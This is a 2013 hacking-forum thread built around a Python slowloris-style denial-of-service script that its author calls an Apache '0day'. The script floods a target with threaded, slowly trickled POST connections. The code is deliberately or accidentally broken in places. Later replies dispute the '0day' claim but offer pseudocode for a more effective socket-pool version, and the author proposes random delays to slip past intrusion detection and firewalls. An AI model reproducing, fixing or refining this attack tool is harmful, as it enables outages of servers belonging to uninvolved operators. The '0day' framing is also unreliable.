[NEW] Apache 0day!!! only available on HTS [NEW]

For the discussion of Perl, Python, Ruby, and PHP and other interpreted languages.

[NEW] Apache 0day!!! only available on HTS [NEW]

Post by Th3_M4d_H4tt3r on Wed Aug 14, 2013 4:05 pm
([msg=76844]see [NEW] Apache 0day!!! only available on HTS [NEW][/msg])

Here is the code HTS, this is proof of concept only, use this only on your own servers, I am not responcible for anything you do with this program.
Code: Select all
#!/usr/bin/python

#Apache Exploit developed by Th3_M4d_H4tt3r

#This exploit crashes (and consumes all connections to the server) within seconds.

#Th3_M4d_H4tt3r
#Attack: Infinite
#Defence: Infinite
#Inteligence: N/A
#Age: 13
#Orgin: Wonderland

import socket
from time import sleep
import threading

print "Welcome to Th3_M4d_H4tt3r's 0day Exploit for apache 2.X.X"

RHOST=raw_input("RHOST: ")
RPORT=int(raw_input("RPORT: "))

def PostExploit(HOST, PORT):
   while 1:
      try:
         s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         s.connect(HOST, PORT)
         s.send('''POST / HTTP/1.1
Host: '''+HOST+'''
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: '''+HOST+''':'''+PORT+'''
Connection: keep-alive
Content-Type: multipart/form-data
Content-Length: 65535

''')
         for i in xrange(0, 65535):
            sleep(1)
            s.send("A")
         s.send("\n\n")
      except:
         pass
count = 0
while 1:
   try:
      Exploit = threading.Thread(target=PostExploit, args=(RHOST, RPORT,))
      Exploit.start()
      count = count+1
      print "Made "+str(count)+" connections."
      print "\033[2A"
   except:
      pass


Do not post this anywere else!

I made some minor tweaks to the code so skids can't use it.
Last edited by Th3_M4d_H4tt3r on Wed Aug 14, 2013 9:40 pm, edited 2 times in total.
Tip me if I helped you!
BTC Address: 15wu8gxFAemZH3jC4km3Z8gMYtKHLxpnEv
User avatar
Th3_M4d_H4tt3r
Experienced User
Experienced User
 
Posts: 54
Joined: Tue Jun 18, 2013 8:25 am
Blog: View Blog (0)


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by F6Zman on Wed Aug 14, 2013 7:50 pm
([msg=76846]see Re: [NEW] Apache 0day!!! only available on HTS [NEW][/msg])

Yeah...

If this works, you are really going to please the moronic script kiddies who don't know anything about programming/hacking until this post gets removed.

Disclaimer :
HackThisSite does not support illegal activities.
F6Zman
New User
New User
 
Posts: 11
Joined: Tue Aug 13, 2013 9:33 am
Blog: View Blog (0)


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by Th3_M4d_H4tt3r on Wed Aug 14, 2013 9:39 pm
([msg=76847]see Re: [NEW] Apache 0day!!! only available on HTS [NEW][/msg])

It crashed my web server with 116 connections :D

also, this is not ilegal to post exploit code, unless the application is closed-source; and you posted it with the intent of attacking other servers, yes; it is ilegall.

I have broken no laws.
Tip me if I helped you!
BTC Address: 15wu8gxFAemZH3jC4km3Z8gMYtKHLxpnEv
User avatar
Th3_M4d_H4tt3r
Experienced User
Experienced User
 
Posts: 54
Joined: Tue Jun 18, 2013 8:25 am
Blog: View Blog (0)


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by F6Zman on Wed Aug 14, 2013 9:44 pm
([msg=76848]see Re: [NEW] Apache 0day!!! only available on HTS [NEW][/msg])

You seem to be quite good at python, how did you learn python?
F6Zman
New User
New User
 
Posts: 11
Joined: Tue Aug 13, 2013 9:33 am
Blog: View Blog (0)


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by apples on Thu Aug 15, 2013 12:43 am
([msg=76849]see Re: [NEW] Apache 0day!!! only available on HTS [NEW][/msg])

this is hilarious! your code sucks.
User avatar
apples
New User
New User
 
Posts: 37
Joined: Sat Apr 12, 2008 8:30 pm
Blog: View Blog (0)


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by ghost107 on Thu Aug 15, 2013 3:56 am
([msg=76851]see Re: [NEW] Apache 0day!!! only available on HTS [NEW][/msg])

The code only DOS-ing the Apache server with POST requests, for a good configured server and firewall that isn't even a threat. I wouldn't call it 0 day exploit.

Since your POSTing the data, you will need the file on the Apache to take the data, since no data is taken it will return 4xx and the connection is dropped.

As a suggestion, I wouldn't use a thread based technique(unless you're trying to use cuda threads), because 1 thing about it you will run out of memory before you deny any service(the more threads it creates the slower it gets), I suggest using a IO strategy instead of the Thread based(usually a computer will have around 1000-2000 threads).
ghost107
Poster
Poster
 
Posts: 132
Joined: Wed Jul 02, 2008 7:57 am
Blog: View Blog (0)


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by Th3_M4d_H4tt3r on Fri Aug 16, 2013 11:05 am
([msg=76888]see Re: [NEW] Apache 0day!!! only available on HTS [NEW][/msg])

This is a 0day, this is a POST based slowloris for apache, nothing to special.
I could use a random delay (1-3 secs) between thread starting, to attempt to mitigate from IDS or firewall, these normaly look for patterns.

If you guys have any more questions/comments PM me, I will update code if neccasary (sure I am great at python, but spelling :lol: ).

Oh and apples, how can I implement the IO stratagy or cuda threads? This should help improve the code.
Tip me if I helped you!
BTC Address: 15wu8gxFAemZH3jC4km3Z8gMYtKHLxpnEv
User avatar
Th3_M4d_H4tt3r
Experienced User
Experienced User
 
Posts: 54
Joined: Tue Jun 18, 2013 8:25 am
Blog: View Blog (0)


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by ghost107 on Fri Aug 16, 2013 1:44 pm
([msg=76889]see Re: [NEW] Apache 0day!!! only available on HTS [NEW][/msg])

You don't have CUDA in python, for IO Strategy, is to not use threads you only use 1 thread(this is more server side, usually it is used for non-blocking functions), if you want to use a multithreaded model to try to manage the threads(using the thread pooling, python has support for thread pooling).

The Method for thread pooling is simple you have a queue that contains the threads you execute, the queue has a normal limit and a max limit:
-the normal limit is the number of threads you keep in the Pool
-the Max limit is the maximum number of threads you allow

The idea of thread pooling instead of creating new threads you use the same threads over and over to handle your operations, that way you keep the best PC speeds.

Plus I don't see the reason why you use threads for the send function which is a non blocking function(it will not block your program functionality).

If you are talking about slowloris is about sending HTTP requests to the Server that is "thread based" server at regular intervals to not close the connection(and dont close the headers with \r\n\r\n).
For Example:
Code: Select all
You connect to the server:
Send (POST / HTTP/1.1)
send(Host: 'HOST)
your loop{
  Wait few seconds before the socket try's to close
  send (Random Header)
}


Using a IO Strategy is simple, for example:
in this example you can have a list of sockets and the last time the socket was sent.
Code: Select all
your loop{
    Create a socket, and connect to the server
    save your socket in the list
    check your list for available sockets,
     get the new list of available sockets
     For each element in the new  list {
           check the socket status
           reconnect the socket if it needs
           send data
      }
}


You can make it hybrid, by creating channels in different threads(by having thread pooling). this way you keep the connection open and be sure your sockets are open, not creating new connections and then sending data.

In slowloris the headers are never closed, if you close the header you let the server to process the data, and and then evaluates your data(your sending headers at once, while you make a post method)
ghost107
Poster
Poster
 
Posts: 132
Joined: Wed Jul 02, 2008 7:57 am
Blog: View Blog (0)


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by Th3_M4d_H4tt3r on Sat Aug 17, 2013 3:45 am
([msg=76892]see Re: [NEW] Apache 0day!!! only available on HTS [NEW][/msg])

That is kind of what I was thinking, I am working on it. 8-)
Tip me if I helped you!
BTC Address: 15wu8gxFAemZH3jC4km3Z8gMYtKHLxpnEv
User avatar
Th3_M4d_H4tt3r
Experienced User
Experienced User
 
Posts: 54
Joined: Tue Jun 18, 2013 8:25 am
Blog: View Blog (0)


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by Goatboy on Thu Aug 22, 2013 8:49 am
([msg=76968]see Re: [NEW] Apache 0day!!! only available on HTS [NEW][/msg])

... Do you know what 0day means?

This is like 1,467day
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk
User avatar
Goatboy
Expert
Expert
 
Posts: 2807
Joined: Mon Jul 07, 2008 9:35 pm
Blog: View Blog (0)


Next

Return to Interpreted Languages

Who is online

Users browsing this forum: No registered users and 0 guests